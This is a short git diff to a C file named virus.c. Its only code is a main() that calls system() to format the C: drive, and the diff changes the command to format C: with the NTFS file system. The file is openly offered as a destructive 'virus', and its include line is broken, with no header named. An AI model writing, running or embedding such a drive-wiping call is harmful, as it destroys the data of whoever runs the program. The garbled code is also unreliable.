diff --git a/virus.c b/virus.c index e8c0fc7..8828d27 100644 --- a/virus.c +++ b/virus.c @@ -1,4 +1,4 @@ #include int main(){ - system("format C:"); + system("format C: /fs:ntfs"); } \ No newline at end of file